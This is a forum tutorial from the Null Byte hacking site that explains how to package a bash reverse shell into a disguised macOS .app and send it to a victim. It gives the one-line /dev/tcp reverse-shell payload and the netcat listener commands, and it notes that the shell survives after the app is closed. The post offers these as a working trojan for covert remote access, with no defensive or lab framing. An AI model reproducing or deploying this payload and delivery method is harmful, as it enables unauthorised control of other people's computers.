Header Banner
Null Byte Logo
Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker

How to Turn a OSX Backdoor into a .App

Feb 16, 2016 03:16 PM
Apr 28, 2016 09:20 PM

Hey its August. I dont know why I post so often but I wanted to add up on a post by Cameron Glass here What we are going to do today is turn that backdoor into a .app file so that we dont even need to touch the victims computer! also thanks to someone who helped me with this. (You know who you are)

Create appify.sh

You can get the appify.sh source/here. Compile it into a .sh file and put it into your /~ folder.

Then Get the Backdoor Code

make sure to get the code!

#!/bin/bash

bash -i >& /dev/tcp/youripaddress/1337 0>&1

save as whatever.sh and put it on your desktop.

Use the Appify Script!

then open a new terminal and type ./appify.sh whatever.sh "App-name-here" Check your desktop or your /~ folder and you should find it in one of those. Once done send to the victim.

Before You Send!

Just like in Cameron's tut you need to use netcat witch is built in to kali and mac osx.

If you are on mac type

nc -l 1337

or kali

nc -l -p 1337

Now You Wait for the Victim to Run the App

And once he/she does you should have a shell! Congratulations! And even if they close the app the shell wont close! Thanks to a family member for helping me with this! -August

You already know how to use your phone. With Gadget Hacks' newsletter, we'll show you how to master it. Each week, we explore features, hidden tools, and advanced settings that give you more control over iOS and Android than most users even know exists.

Sign up for Gadget Hacks Weekly and start unlocking your phone's full potential.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!